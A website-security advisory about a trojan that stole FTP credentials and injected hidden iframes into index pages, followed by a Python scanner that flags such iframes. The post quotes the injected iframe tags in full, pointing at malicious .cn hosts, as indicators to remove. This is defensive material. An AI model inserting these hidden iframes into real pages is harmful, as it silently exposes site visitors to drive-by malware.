
We recently received a report from a client of ours whose site was blacklisted by Google, unbeknownst to his team. It appears a trojan was installed on the host PC, worked its way into the FTP program, and hijacked the FTP user names and passwords of all the sites in the FTP list. It then attacked the index.php, asp, html, and htm pages and installed this little bugger:
<iframe src="http://shopmoviefestival.cn:8080/index.php" width=158 height=140 style="visibility: hidden"></iframe>
or
<iframe src="http://shopfilmlifescience.cn:8080/index.php" width=151 height=110 style="visibility: hidden"></iframe>
<iframe src="http://gianthighest.cn:8080/index.php" width=150 height=181 style="visibility: hidden"></iframe>
or
<iframe rel="nofollow" src="/interstitial?uri=http://shopmoviefestival.cn:8080/index.php" height="134" width="170">
</iframe>
We also got reports of the actual URL changing, but we did notice that it only targets homepages, or any file with /index in its name, even in the control panel. Some suggestions are:
In your index.html, php, htm, etc. files, right after the opening body tag, there is a hidden iframe linking to http://shopmoviefestival.cn:8080/index.php. You'll need to remove this.
Did you scan your PC with AVG, Spybot and Malwarebytes?
Did you change your FTP password?
Did you change your protocol from FTP to either SFTP or FTPS?
Did you change to a non-administrator account on your PC?
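An added example, not part of the original post: a Python script that walks a web root and flags index.php, asp, html and htm files containing an iframe that is hidden or that loads from a host not on an allow-list, including the /interstitial?uri= wrapped form shown above. The function names, the allow-list, the extra display:none check and the .example hosts are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import parse_qs, urlparse

INDEX_RE = re.compile(r"^index\.(php|asp|html|htm)$", re.I)  # file types named in the post
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']?([^"'\s>]+)""", re.I)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)

def iframe_host(src):  # host a src points at, unwrapping /path?uri=<url> wrappers
    parsed = urlparse(src)
    if not parsed.netloc:
        parsed = urlparse(parse_qs(parsed.query).get("uri", [""])[0])
    return parsed.hostname or ""

def scan_text(text, allowed_hosts=()):
    """Flag iframes that are hidden or that load from a host not on the allow-list."""
    findings = []
    for tag in IFRAME_RE.findall(text):
        host = iframe_host(m.group(1)) if (m := SRC_RE.search(tag)) else ""
        hidden = bool(HIDDEN_RE.search(tag))
        if hidden or (host and host not in allowed_hosts):
            findings.append({"host": host, "hidden": hidden, "tag": tag})
    return findings

def scan_webroot(root, allowed_hosts=()):
    """Walk root and return {relative path: findings} for each index.* file with a hit."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and INDEX_RE.match(path.name):
            if found := scan_text(path.read_text(encoding="utf-8", errors="replace"), allowed_hosts):
                report[path.relative_to(root).as_posix()] = found
    return report

def demo():
    """Scan a constructed web root; the pages and .example hosts are made up."""
    bad = "http://malicious.example:8080/index.php"
    pages = {
        "index.php": f'<body><iframe src="{bad}" width=158 style="visibility: hidden"></iframe>',
        "admin/index.html": f'<iframe rel="nofollow" src="/interstitial?uri={bad}"></iframe>',
        "index.htm": '<iframe src="https://video.trusted.example/embed/1"></iframe>',
        "about.html": f'<iframe src="{bad}"></iframe>',  # not an index file, so skipped
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, html in pages.items():
            page = Path(root, rel)
            page.parent.mkdir(parents=True, exist_ok=True)
            page.write_text(html, encoding="utf-8")
        return scan_webroot(root, allowed_hosts={"video.trusted.example"})
```

Point scan_webroot at a local copy of the site and pass the hosts you embed on purpose as allowed_hosts; anything it reports is a tag to inspect and remove by hand.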
We hope this keeps you and your websites safe. As always feel free to contact us with any fixes, solutions or reports.
Internet Safe List






